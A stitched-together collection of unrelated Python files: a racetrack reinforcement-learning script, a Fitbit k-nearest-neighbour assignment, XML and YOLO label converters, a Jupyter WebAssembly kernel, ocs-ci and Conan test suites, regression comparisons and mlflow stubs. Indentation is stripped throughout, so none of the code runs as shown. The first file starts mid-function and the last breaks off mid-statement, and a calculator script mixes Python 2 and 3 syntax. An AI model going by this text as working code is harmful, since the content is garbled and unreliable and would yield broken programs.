if display:
self._print_episode(s)
# test greedy policy
# break if victory
# s, a, r = self._generate_episode(True)
# if r > -1000:
# break
course = np.array([
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,9],
[0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9],
[0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9],
[0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9],
[0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9],
[0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9],
[0,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0],
[0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
[0,0,0,0,8,8,8,8,8,8,0,0,0,0,0,0,0,0]])
env = RaceTrack(course)
player = Agent(env)
# with open('racetrack/player.pickle', 'rb') as f:
# pickle.load(f)
player.train(1000)
player.play(4, True)
with open('racetrack/player.pickle', 'wb') as f:
pickle.dump(player, f)
|
import shelve
email_db = shelve.open('../Scripts/emails')
arr =['gstaines1@usnews.com', 'Gustave']
print(email_db['Gustave'],arr[0]) |
#created and edited by Samuel Phillips
#imports for data, classes and more
import pandas as pd
import numpy as np
from sklearn.datasets import load_iris
from sklearn import tree, metrics
from sklearn.model_selection import train_test_split
from matplotlib import pyplot as plt
from sklearn.neighbors import KNeighborsClassifier
#decided to use classifiers on the fitbit data with topics from assignment 2
#as I think comparing two topics and then using the k nearest neighbor classifier
#is a good way to compare two similar topics
#also wanted to do a scatterplot to show attributes of the fitbit data
#fitbit data is loaded
#used daily steps taken and daily calories burned from the series
#of different fitbit csv files
data = pd.read_csv('Fitabase_Data/dailySteps_merged.csv')
d1 = data.loc[:,'StepTotal']
d1 = d1.values
data = pd.read_csv('Fitabase_Data/dailyCalories_merged.csv')
d2 = data.loc[:,'Calories']
d2 = d2.values
#X value for train test split is found
X = []
for i in range(0, len(d1)):
X.append([d1[i], d2[i]])
#y value for the train test split is found
ids = data.loc[:, 'Id']
y = ids.values
#train test split with k nearest neighbors is used in this example
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
n = KNeighborsClassifier()
n.fit(X_train, y_train)
p1 = n.predict(X_test)
X_test = np.array(X_test)
#figure is created and first point is
plt.figure(figsize=(15,15))
#plot is supplied with all the correlated points between calories and steps in a day
plt.scatter(X[0][0], X[0][1], facecolors='none', edgecolors='black', label='Steps x Calories')
for i in range(1, len(y)):
plt.scatter(X[i][0], X[i][1], facecolors='none', edgecolors='black')
#incorrect and correct lists are stated
corrX, corrY = [], []
incorX, incorY = [], []
#for loop that finds all the incorrect and correct points from
#the k nearest neighbor train test split
for i in range(0, len(p1)):
if p1[i] == y_test[i]:
corrX.append(X_test[:, :1][i])
corrY.append(X_test[:, 1:][i])
elif p1[i] != y_test[i]:
incorX.append(X_test[:, :1][i])
incorY.append(X_test[:, 1:][i])
#first points of the correct and incorrect predictions are plotted
plt.scatter(corrX[0], corrY[0], color='cyan', marker=(5, 1), label='correct prediction')
plt.scatter(incorX[0], incorY[0], color='hotpink', marker=(5, 1), label='incorrect prediction')
#two for loops that plot the incorrect and correct prediction points
for i in range(0, len(corrX)):
plt.scatter(corrX[i], corrY[i], color='cyan', marker=(5, 1))
for i in range(0, len(incorX)):
plt.scatter(incorX[i], incorY[i], color='hotpink', marker=(5, 1))
#plot is given attributes to help with analysis
plt.legend()
plt.xlabel('Steps Taken in a Day')
plt.ylabel('Calories Burned in a Day')
plt.title('Comparing Calories Burned in a Day with Steps taken in a Day')
#error rate is found and set
err = (len(incorX))/(len(incorX)+len(corrX))
err = err*100
#interesting takeaways from this assignment printed out
print('Interesting facts/ takeaways:')
print(' - There is a strong positive correlation between calories burned in a day and steps taken in a day')
print(' - Correct Predictions: ' + str(len(corrX)))
print(' - Incorrect Predictions: ' + str(len(incorX)))
print(' - Error Rate Percentage in the test sample: ' + str(err) + '%')
print(' - Major Takeaway from this Assignment: K nearest neighbor has a high error rate with high population counts')
print(' - Maybe this could be a good example of why k nearest neighbor classifier works best with smaller population sizes')
#finally the scatter plot is saved as a pdf file
plt.savefig('a6_scatter.pdf') |
'''
use xmltodict library to export json file from xml file
'''
import io, xmltodict, json
infile = io.open("books.xml", 'r')
outfile = io.open("books.json", 'wb')
o = xmltodict.parse( infile.read() )
json.dump( o , outfile, indent=2) |
%cd /content/keras-YOLOv3-model-set
import os
import glob
CLASS_NAMES = [ "cat", "dog" ]
# TAGET_FOLDER_NAME = "labels"
TAGET_FOLDER_NAME = "dogs_cats_yolo_labeled"
label_file_names = []
for file_name in glob.glob(TAGET_FOLDER_NAME+'/*.xml'):
label_file_names.append(file_name)
print(len(label_file_names))
print(label_file_names)
import xml.etree.ElementTree as ET
all_record = []
for file_name in label_file_names:
with open(file_name) as in_file:
tree = ET.parse(in_file)
root = tree.getroot()
a_record = [ file_name.replace("xml", "jpg") ]
for obj in root.iter('object'):
difficult = obj.find('difficult').text
cls = obj.find('name').text
if cls not in CLASS_NAMES or int(difficult)==1:
continue
cls_id = str(CLASS_NAMES.index(cls))
xmlbox = obj.find('bndbox')
xmin = xmlbox.find('xmin').text
ymin = xmlbox.find('ymin').text
xmax = xmlbox.find('xmax').text
ymax = xmlbox.find('ymax').text
a_record.append(",".join([xmin,ymin,xmax,ymax,cls_id]))
all_record.append(a_record)
with open("labels.txt", "w") as f:
for a_record in all_record:
print(a_record)
f.write(" ".join([str(i) for i in a_record]))
f.write("\n")
print("labels.txt created.")
|
from . import __version__
from .defs import (
ENV_LOG_FILE,
ENV_LOG_LEVEL,
ENV_WASM_INTERPRETER,
LESS_THAN_OCAML_MAX_INT,
KERNEL_IMPLEMENTATION_NAME,
KERNEL_NAME,
)
from ipykernel.kernelbase import Kernel # type: ignore
import os
import logging
import pexpect # type: ignore
from .wasm_replwrap import WasmREPLWrapper
import shutil
import re
import signal
from subprocess import check_output
import sys
import traceback
from typing import Dict, Any
version_pat = re.compile(r"wasm (\d+(\.\d+)+)")
error_pat = re.compile(
r"stdin:(\d+.\d+-\d+.\d+): (.+?): (.+)"
) # 1=location, 2=type, 3=details
log_level = int(os.environ.get(ENV_LOG_LEVEL, str(logging.WARNING)))
log_params: Dict[str, Any] = {"level": log_level}
log_path = os.environ.get(ENV_LOG_FILE)
if log_path is not None:
log_params["filename"] = log_path
logging.basicConfig(**log_params)
logger = logging.getLogger(__name__)
class WasmKernel(Kernel):
def __init__(self, **kwargs):
Kernel.__init__(self, **kwargs)
env_interpreter = os.environ.get(ENV_WASM_INTERPRETER, "wasm")
self._interpreter_path = shutil.which(env_interpreter)
if self._interpreter_path is None:
raise Exception(
"Unable to find a `%s` executable in $PATH: %s"
% (env_interpreter, os.environ.get("PATH"))
)
self._start_wasm()
implementation = KERNEL_IMPLEMENTATION_NAME
implementation_version = __version__
_banner = None
_interpreter_path = None
child = None
@property
def banner(self):
if self._banner is None:
self._banner = check_output(
[self._interpreter_path, "-v", "-e", ""]
).decode("utf-8")
return self._banner
@property
def language_version(self):
m = version_pat.search(self.banner)
return m.group(1)
language_info = {
"name": KERNEL_NAME,
"codemirror_mode": "commonlisp",
"mimetype": "text/x-common-lisp",
"file_extension": ".wat",
}
def _start_wasm(self, kill_existing=False):
logger.debug(
"starting new wasm process" + ", 1 wasm process already exists"
if self.child
else ""
)
if kill_existing and self.child is not None:
logger.debug("killing existing wasm process")
try:
self.child.terminate(force=True)
except Exception:
logger.debug(
"encountered an error while killing existing wasm process",
exc_info=True,
)
# Signal handlers are inherited by forked processes, and we can't easily
# reset it from the subprocess. Since kernelapp ignores SIGINT except in
# message handlers, we need to temporarily reset the SIGINT handler here
# so that wasm is interruptible.
sig = signal.signal(signal.SIGINT, signal.SIG_DFL)
try:
logger.info("using wasm interpreter at `%s`" % self._interpreter_path)
# Use `-w 10000` to increase output width from 80 to something much larger so that
# text wrapping is handled by the jupyter frontend instead of the wasm interpreter
self.child = pexpect.spawn(
self._interpreter_path,
["-w", LESS_THAN_OCAML_MAX_INT],
echo=False,
encoding="utf-8",
codec_errors="replace",
)
self.wasmwrapper = WasmREPLWrapper(self.child)
finally:
signal.signal(signal.SIGINT, sig)
# NOTE: use the following line to run any prep operation on the Wasm interpreter
# self.wasmwrapper.run_command(image_setup_cmd)
def do_execute(
self, code, silent, store_history=True, user_expressions=None, allow_stdin=False
):
logger.debug("do_execute received: ```%s```", code)
code = code.rstrip()
logger.debug("do_execute will run: ```%s```", code)
self.silent = silent
if not code:
return {
"status": "ok",
"execution_count": self.execution_count,
"payload": [],
"user_expressions": {},
}
try:
output = self.wasmwrapper.run_command(code, timeout=None)
logger.debug("response from run_command: ```%s```" % output)
except pexpect.EOF:
logger.debug("pexpect.EOF raised during run_command")
output = self.wasmwrapper.child.before + "Restarting Wasm"
self._start_wasm()
except KeyboardInterrupt:
logger.debug("KeyboardInterrupt raised during run_command")
# TODO if the wasm interpreter ever support SIGINT or some other interrupt mechanism,
# use that instead so that the entire interpreter's state doesn't have to be thrown
# out when a single execution is aborted.
self.send_response(
self.iopub_socket,
"error",
{
"ename": "interrupt",
"evalue": "",
"traceback": ["Restarting Wasm because execution was aborted"],
},
)
self._start_wasm(kill_existing=True)
return {"status": "abort", "execution_count": self.execution_count}
except Exception:
logger.exception("unknown error raised during run_command", exc_info=True)
exc_type, exc_value, exc_traceback = sys.exc_info()
error_content = {
"ename": "unknown",
"evalue": "",
"traceback": [
"Restarting Wasm due to unknown error: " + repr(exc_value) + "\n\n"
]
+ traceback.format_tb(exc_traceback),
}
self.send_response(self.iopub_socket, "error", error_content)
self._start_wasm(kill_existing=True)
error_content["execution_count"] = self.execution_count
error_content["status"] = "error"
return error_content
wasm_error = error_pat.search(output)
if wasm_error:
location, errtype, details = wasm_error.groups()
error_content = {"ename": errtype, "evalue": details, "traceback": [output]}
self.send_response(self.iopub_socket, "error", error_content)
error_content["execution_count"] = self.execution_count
error_content["status"] = "error"
return error_content
else:
if not self.silent:
self.send_response(
self.iopub_socket, "stream", {"name": "stdout", "text": output}
)
return {
"status": "ok",
"execution_count": self.execution_count,
"payload": [],
"user_expressions": {},
}
# TODO def is_complete_request by using `wasm -d` which just runs validation
# TODO def do_complete(self, code, cursor_pos):
# https://github.com/wasmerio/vscode-wasm/blob/master/syntaxes/wat.json
# https://code.visualstudio.com/api/language-extensions/language-configuration-guide
|
#!/usr/bin/python
# Given two numbers x and y, return the sum of x and y.
# number, number --> number
# Example:
# add(1,2) = 3
# add(0,2) = 2
def add(x, y):
return x + y
# Given two numbers x and y, return the product of x and y.
# number, number --> number
# Example:
# multiply(1,2) = 2
# multiply(4,2) = 8
# multiply(4,0) = 0
def multiply(x,y):
return x * y
def showUI():
operation = input("Choose your operation (1 - add; 2 - multiply): ")
print("Input the two numbers")
x = input("x = ")
y = input("y = ")
if(operation == 1):
print "sum = " + str(add(x,y))
elif(operation == 2):
print "product = " + str(multiply(x, y))
if __name__ == "__main__":
showUI()
|
import logging
import pytest
from ocs_ci.ocs import constants
from ocs_ci.framework.testlib import (
skipif_ocs_version,
ManageTest,
tier1,
skipif_ocp_version,
kms_config_required,
skipif_managed_service,
skipif_disconnected_cluster,
skipif_proxy_cluster,
config,
)
from ocs_ci.ocs.resources import pvc
from ocs_ci.ocs.resources import pod
from ocs_ci.helpers import helpers
from ocs_ci.ocs.exceptions import (
KMSResourceCleaneupError,
ResourceNotFoundError,
)
from ocs_ci.utility import kms
from semantic_version import Version
log = logging.getLogger(__name__)
# Set the arg values based on KMS provider.
if config.ENV_DATA["KMS_PROVIDER"].lower() == constants.HPCS_KMS_PROVIDER:
kmsprovider = constants.HPCS_KMS_PROVIDER
argnames = ["kv_version", "kms_provider"]
argvalues = [
pytest.param("v1", kmsprovider),
]
else:
kmsprovider = constants.VAULT_KMS_PROVIDER
argnames = ["kv_version", "kms_provider", "use_vault_namespace"]
if config.ENV_DATA.get("vault_hcp"):
argvalues = [
pytest.param(
"v1", kmsprovider, True, marks=pytest.mark.polarion_id("OCS-3971")
),
pytest.param(
"v2", kmsprovider, True, marks=pytest.mark.polarion_id("OCS-3972")
),
]
else:
argvalues = [
pytest.param(
"v1", kmsprovider, False, marks=pytest.mark.polarion_id("OCS-2650")
),
pytest.param(
"v2", kmsprovider, False, marks=pytest.mark.polarion_id("OCS-2651")
),
]
@tier1
@skipif_ocs_version("<4.8")
@skipif_ocp_version("<4.8")
@kms_config_required
@skipif_managed_service
@skipif_disconnected_cluster
@skipif_proxy_cluster
@pytest.mark.parametrize(
argnames=argnames,
argvalues=argvalues,
)
class TestEncryptedRbdClone(ManageTest):
"""
Tests to verify PVC to PVC clone feature for encrypted RBD Block VolumeMode PVCs
"""
@pytest.fixture(autouse=True)
def setup(
self,
kv_version,
kms_provider,
use_vault_namespace,
pv_encryption_kms_setup_factory,
project_factory,
multi_pvc_factory,
pod_factory,
storageclass_factory,
):
"""
Setup csi-kms-connection-details configmap and create resources for the test
"""
log.info("Setting up csi-kms-connection-details configmap")
self.kms = pv_encryption_kms_setup_factory(kv_version, use_vault_namespace)
log.info("csi-kms-connection-details setup successful")
# Create a project
self.proj_obj = project_factory()
# Create an encryption enabled storageclass for RBD
self.sc_obj = storageclass_factory(
interface=constants.CEPHBLOCKPOOL,
encrypted=True,
encryption_kms_id=self.kms.kmsid,
)
if kms_provider == constants.VAULT_KMS_PROVIDER:
# Create ceph-csi-kms-token in the tenant namespace
self.kms.vault_path_token = self.kms.generate_vault_token()
self.kms.create_vault_csi_kms_token(namespace=self.proj_obj.namespace)
# Create PVC and Pods
self.pvc_size = 1
self.pvc_objs = multi_pvc_factory(
interface=constants.CEPHBLOCKPOOL,
project=self.proj_obj,
storageclass=self.sc_obj,
size=self.pvc_size,
access_modes=[
f"{constants.ACCESS_MODE_RWX}-Block",
f"{constants.ACCESS_MODE_RWO}-Block",
],
status=constants.STATUS_BOUND,
num_of_pvc=2,
wait_each=False,
)
self.pod_objs = helpers.create_pods(
self.pvc_objs,
pod_factory,
constants.CEPHBLOCKPOOL,
pods_for_rwx=1,
status=constants.STATUS_RUNNING,
)
# Verify if the key is created in Vault
self.vol_handles = []
for pvc_obj in self.pvc_objs:
pv_obj = pvc_obj.backed_pv_obj
vol_handle = pv_obj.get().get("spec").get("csi").get("volumeHandle")
self.vol_handles.append(vol_handle)
if kms_provider == constants.VAULT_KMS_PROVIDER:
if kms.is_key_present_in_path(
key=vol_handle, path=self.kms.vault_backend_path
):
log.info(f"Vault: Found key for {pvc_obj.name}")
else:
raise ResourceNotFoundError(
f"Vault: Key not found for {pvc_obj.name}"
)
def test_pvc_to_pvc_clone(self, kv_version, kms_provider, pod_factory):
"""
Test to create a clone from an existing encrypted RBD PVC.
Verify that the cloned PVC is encrypted and all the data is preserved.
"""
log.info("Checking for encrypted device and running IO on all pods")
for vol_handle, pod_obj in zip(self.vol_handles, self.pod_objs):
if pod_obj.exec_sh_cmd_on_pod(
command=f"lsblk | grep {vol_handle} | grep crypt"
):
log.info(f"Encrypted device found in {pod_obj.name}")
else:
raise ResourceNotFoundError(
f"Encrypted device not found in {pod_obj.name}"
)
log.info(f"File created during IO {pod_obj.name}")
pod_obj.run_io(
storage_type="block",
size="500M",
io_direction="write",
runtime=60,
end_fsync=1,
direct=1,
)
log.info("IO started on all pods")
# Wait for IO completion
for pod_obj in self.pod_objs:
pod_obj.get_fio_results()
log.info("IO completed on all pods")
cloned_pvc_objs, cloned_vol_handles = ([] for i in range(2))
# Calculate the md5sum value and create clones of exisiting PVCs
log.info("Calculate the md5sum after IO and create clone of all PVCs")
for pod_obj in self.pod_objs:
pod_obj.md5sum_after_io = pod.cal_md5sum(
pod_obj=pod_obj,
file_name=pod_obj.get_storage_path(storage_type="block"),
block=True,
)
cloned_pvc_obj = pvc.create_pvc_clone(
self.sc_obj.name,
pod_obj.pvc.name,
constants.CSI_RBD_PVC_CLONE_YAML,
self.proj_obj.namespace,
volume_mode=constants.VOLUME_MODE_BLOCK,
access_mode=pod_obj.pvc.access_mode,
)
helpers.wait_for_resource_state(cloned_pvc_obj, constants.STATUS_BOUND)
cloned_pvc_obj.reload()
cloned_pvc_obj.md5sum = pod_obj.md5sum_after_io
cloned_pvc_objs.append(cloned_pvc_obj)
log.info("Clone of all PVCs created")
# Create and attach pod to the pvc
cloned_pod_objs = helpers.create_pods(
cloned_pvc_objs,
pod_factory,
constants.CEPHBLOCKPOOL,
pods_for_rwx=1,
status="",
)
# Verify the new pods are running
log.info("Verify the new pods are running")
for pod_obj in cloned_pod_objs:
helpers.wait_for_resource_state(pod_obj, constants.STATUS_RUNNING)
pod_obj.reload()
log.info("Verified: New pods are running")
# Verify encryption keys are created for cloned PVCs in Vault
for pvc_obj in cloned_pvc_objs:
pv_obj = pvc_obj.backed_pv_obj
vol_handle = pv_obj.get().get("spec").get("csi").get("volumeHandle")
cloned_vol_handles.append(vol_handle)
if kms_provider == constants.VAULT_KMS_PROVIDER:
if kms.is_key_present_in_path(
key=vol_handle, path=self.kms.vault_backend_path
):
log.info(f"Vault: Found key for restore PVC {pvc_obj.name}")
else:
raise ResourceNotFoundError(
f"Vault: Key not found for restored PVC {pvc_obj.name}"
)
# Verify encrypted device is present and md5sum on all pods
for vol_handle, pod_obj in zip(cloned_vol_handles, cloned_pod_objs):
if pod_obj.exec_sh_cmd_on_pod(
command=f"lsblk | grep {vol_handle} | grep crypt"
):
log.info(f"Encrypted device found in {pod_obj.name}")
else:
raise ResourceNotFoundError(
f"Encrypted device not found in {pod_obj.name}"
)
log.info(f"Verifying md5sum on pod {pod_obj.name}")
pod.verify_data_integrity(
pod_obj=pod_obj,
file_name=pod_obj.get_storage_path(storage_type="block"),
original_md5sum=pod_obj.pvc.md5sum,
block=True,
)
log.info(f"Verified md5sum on pod {pod_obj.name}")
# Run IO on new pods
log.info("Starting IO on new pods")
for pod_obj in cloned_pod_objs:
pod_obj.run_io(storage_type="block", size="100M", runtime=10)
# Wait for IO completion on new pods
log.info("Waiting for IO completion on new pods")
for pod_obj in cloned_pod_objs:
pod_obj.get_fio_results()
log.info("IO completed on new pods.")
# Delete the restored pods, PVC and snapshots
log.info("Deleting all pods")
for pod_obj in cloned_pod_objs + self.pod_objs:
pod_obj.delete()
pod_obj.ocp.wait_for_delete(resource_name=pod_obj.name)
log.info("Deleting all PVCs")
for pvc_obj in cloned_pvc_objs + self.pvc_objs:
pv_obj = pvc_obj.backed_pv_obj
pvc_obj.delete()
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name)
if kms_provider == constants.VAULT_KMS_PROVIDER:
# Verify if the keys for parent and cloned PVCs are deleted from Vault
if kv_version == "v1" or Version.coerce(
config.ENV_DATA["ocs_version"]
) >= Version.coerce("4.9"):
log.info(
"Verify whether the keys for cloned PVCs are deleted from vault"
)
for key in cloned_vol_handles + self.vol_handles:
if not kms.is_key_present_in_path(
key=key, path=self.kms.vault_backend_path
):
log.info(f"Vault: Key deleted for {key}")
else:
raise KMSResourceCleaneupError(
f"Vault: Key deletion failed for {key}"
)
log.info("All keys from vault were deleted")
|
import unittest
from conans.test.utils.tools import TestClient, TestBufferConanOutput
import os
import zipfile
from conans.test.utils.test_files import temp_folder
from conans.util.files import load, save_files, save
from conans.client.remote_registry import RemoteRegistry, Remote
from mock import patch
from conans.client.rest.uploader_downloader import Downloader
from conans import tools
from conans.client.conf import ConanClientConfigParser
import shutil
win_profile = """[settings]
os: Windows
"""
linux_profile = """[settings]
os: Linux
"""
remotes = """myrepo1 https://myrepourl.net False
my-repo-2 https://myrepo2.com True
"""
registry = """myrepo1 https://myrepourl.net False
Pkg/1.0@user/channel myrepo1
"""
settings_yml = """os:
Windows:
Linux:
arch: [x86, x86_64]
"""
conan_conf = """
[log]
run_to_output = False # environment CONAN_LOG_RUN_TO_OUTPUT
level = 10 # environment CONAN_LOGGING_LEVEL
[general]
compression_level = 6 # environment CONAN_COMPRESSION_LEVEL
cpu_count = 1 # environment CONAN_CPU_COUNT
[proxies]
# Empty section will try to use system proxies.
# If don't want proxy at all, remove section [proxies]
# As documented in http://docs.python-requests.org/en/latest/user/advanced/#proxies
http = http://user:pass@10.10.1.10:3128/
no_proxy = mylocalhost
https = None
# http = http://10.10.1.10:3128
# https = http://10.10.1.10:1080
"""
def zipdir(path, zipfilename):
with zipfile.ZipFile(zipfilename, 'w', zipfile.ZIP_DEFLATED) as z:
for root, _, files in os.walk(path):
for f in files:
z.write(os.path.join(root, f))
class ConfigInstallTest(unittest.TestCase):
def setUp(self):
self.client = TestClient()
registry_path = self.client.client_cache.registry
save(registry_path, """my-repo-2 https://myrepo2.com True
conan-center https://conan-center.com
MyPkg/0.1@user/channel my-repo-2
Other/1.2@user/channel conan-center
""")
save(os.path.join(self.client.client_cache.profiles_path, "default"), "#default profile empty")
save(os.path.join(self.client.client_cache.profiles_path, "linux"), "#empty linux profile")
def _create_profile_folder(self, folder=None):
folder = folder or temp_folder(path_with_spaces=False)
save_files(folder, {"settings.yml": settings_yml,
"remotes.txt": remotes,
"profiles/linux": linux_profile,
"profiles/windows": win_profile,
"config/conan.conf": conan_conf,
"pylintrc": "#Custom pylint"})
return folder
def _create_zip(self, zippath=None):
folder = self._create_profile_folder()
zippath = zippath or os.path.join(folder, "myconfig.zip")
zipdir(folder, zippath)
return zippath
def _check(self, install_path):
settings_path = self.client.client_cache.settings_path
self.assertEqual(load(settings_path).splitlines(), settings_yml.splitlines())
registry_path = self.client.client_cache.registry
registry = RemoteRegistry(registry_path, TestBufferConanOutput())
self.assertEqual(registry.remotes,
[Remote("myrepo1", "https://myrepourl.net", False),
Remote("my-repo-2", "https://myrepo2.com", True),
])
self.assertEqual(registry.refs, {"MyPkg/0.1@user/channel": "my-repo-2"})
self.assertEqual(sorted(os.listdir(self.client.client_cache.profiles_path)),
sorted(["default", "linux", "windows"]))
self.assertEqual(load(os.path.join(self.client.client_cache.profiles_path, "linux")).splitlines(),
linux_profile.splitlines())
self.assertEqual(load(os.path.join(self.client.client_cache.profiles_path, "windows")).splitlines(),
win_profile.splitlines())
conan_conf = ConanClientConfigParser(self.client.client_cache.conan_conf_path)
self.assertEqual(conan_conf.get_item("log.run_to_output"), "False")
self.assertEqual(conan_conf.get_item("log.run_to_file"), "False")
self.assertEqual(conan_conf.get_item("log.level"), "10")
self.assertEqual(conan_conf.get_item("general.compression_level"), "6")
self.assertEqual(conan_conf.get_item("general.sysrequires_sudo"), "True")
self.assertEqual(conan_conf.get_item("general.cpu_count"), "1")
self.assertEqual(conan_conf.get_item("general.config_install"), install_path)
self.assertEqual(conan_conf.get_item("proxies.no_proxy"), "mylocalhost")
self.assertEqual(conan_conf.get_item("proxies.https"), "None")
self.assertEqual(conan_conf.get_item("proxies.http"), "http://user:pass@10.10.1.10:3128/")
self.assertEqual("#Custom pylint",
load(os.path.join(self.client.client_cache.conan_folder, "pylintrc")))
def install_file_test(self):
""" should install from a file in current dir
"""
zippath = self._create_zip()
self.client.run('config install "%s"' % zippath)
self._check(zippath)
self.assertTrue(os.path.exists(zippath))
def test_without_profile_folder(self):
shutil.rmtree(self.client.client_cache.profiles_path)
zippath = self._create_zip()
self.client.run('config install "%s"' % zippath)
self.assertEqual(sorted(os.listdir(self.client.client_cache.profiles_path)),
sorted(["linux", "windows"]))
self.assertEqual(load(os.path.join(self.client.client_cache.profiles_path, "linux")).splitlines(),
linux_profile.splitlines())
def install_url_test(self):
""" should install from a URL
"""
def my_download(obj, url, filename, **kwargs): # @UnusedVariable
self._create_zip(filename)
with patch.object(Downloader, 'download', new=my_download):
self.client.run("config install http://myfakeurl.com/myconf.zip")
self._check("http://myfakeurl.com/myconf.zip")
# repeat the process to check
self.client.run("config install http://myfakeurl.com/myconf.zip")
self._check("http://myfakeurl.com/myconf.zip")
def install_repo_test(self):
""" should install from a git repo
"""
folder = self._create_profile_folder()
with tools.chdir(folder):
self.client.runner('git init .')
self.client.runner('git add .')
self.client.runner('git config user.name myname')
self.client.runner('git config user.email myname@mycompany.com')
self.client.runner('git commit -m "mymsg"')
self.client.run('config install "%s/.git"' % folder)
self._check("%s/.git" % folder)
def reinstall_test(self):
""" should use configured URL in conan.conf
"""
zippath = self._create_zip()
self.client.run('config set general.config_install="%s"' % zippath)
self.client.run("config install")
self._check(zippath)
def reinstall_error_test(self):
""" should use configured URL in conan.conf
"""
error = self.client.run("config install", ignore_error=True)
self.assertTrue(error)
self.assertIn("Called config install without arguments", self.client.out)
|
'''
print below pattern
3 * 1 = 3
3 * 2 = 6
3 * 3 = 9
3 * 4 = 12
3 * 5 = 15
3 * 6 = 18
3 * 7 = 21
3 * 8 = 24
3 * 9 = 27
3 * 10 = 30
'''
def print_pattern_14(n):
for i in range(1, 11):
pattern = str(n) + " * " + str(i) + " = " + str(n * i)
print(pattern)
print_pattern_14(3) |
import os
from pyutil.program.jsonconf import parse
conf = parse(os.path.normpath(os.path.join(os.path.dirname(__file__), '../config/deploy.json')))
|
import pandas as pd
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import Ridge
from sklearn.linear_model import Lasso
from sklearn.linear_model import ElasticNet
import matplotlib.pyplot as plt
# Read Data
url = 'https://goo.gl/sXleFv'
names = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO',
'B', 'LSTAT', 'MEDV']
data = pd.read_csv(url, delim_whitespace=True, names=names)
# Feature - Target Split
data_values = data.values
print(data.shape)
feature = data_values[:,0:13]
target = data_values[:,13]
# Models
models = []
models.append(('LinearRegression',LinearRegression()))
models.append(('Ridge',Ridge()))
models.append(('Lasso',Lasso()))
models.append(('ElasticNet',ElasticNet()))
# Cross Validation
results =[]
names =[]
for name, model in models:
kfold = KFold(n_splits=10, random_state = 7)
cv_results = cross_val_score(model, feature, target, cv=kfold , scoring = "r2")
results.append(cv_results)
names.append(name)
msg = "%s: %f (%f)" % (name, cv_results.mean(), cv_results.std())
print(msg)
# Algorithm comparison
fig = plt.figure()
fig.suptitle('Algorithm Comparison')
ax = fig.add_subplot(111)
plt.boxplot(results)
ax.set_xticklabels(names)
plt.show() |
# Ques-4 Write a Python program to sort a list of dictionaries using Lambda.
l = [{'make': 'Nokia', 'model': 216, 'color': 'Black'}, {'make': 'Mi Max', 'model': 2,'color': 'Gold'}, {'make': 'Samsung', 'model': 7, 'color': 'Blue'}]
sort_l = sorted(l, key = lambda x: x['model'])
print(sort_l)
|
import mlflow
def logModel(model):
mlflow.pyfunc.log_model(artifact_path="model",python_model=model)
# mlflow.pyfunc.save_model(
# path=model_path,
# python_model=model,
# code_path=['multi_model.py'],
# conda_env={
# 'channels': ['defaults', 'conda-forge'],
# 'dependencies': [
# 'mlflow=1.2.0',
# 'numpy=1.16.5',
# 'python=3.6.9',
# 'scikit-learn=0.21.3',
# 'cloudpickle==1.2.2'
# ],
# 'name': 'mlflow-env'
# }
# )
def loadModel(model):
#mlflow.pyfunc.load_model
pass
# we don't have predefined pkg to save LDA model. so we need to use generic pyfunc
def saveModel(model):
#mlflow.pyfunc.save_model
pass
|
import argparse
import os
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
import torch.nn.functional as F
import time
import numpy as np
import pdb
import cv2
# import imageio
import utils.logger as logger
import models.anynet
parser = argparse.ArgumentParser(description='AnyNet with Flyingthings3d')
parser.add_argument('--maxdisp', type=int, default=192, help='maxium disparity')
parser.add_argument('--loss_weights', type=float, nargs='+', default=[0.25, 0.5, 1., 1.])
parser.add_argument('--maxdisplist', type=int, nargs='+', default=[12, 3, 3])
parser.add_argument('--datapath', default=None,
help='datapath')
parser.add_argument('--datatype', default='carla',
help='datapath')
parser.add_argument('--epochs', type=int, default=10,
help='number of epochs to train')
parser.add_argument('--train_bsize', type=int, default=6,
help='batch size for training (default: 6)')
parser.add_argument('--test_bsize', type=int, default=1,
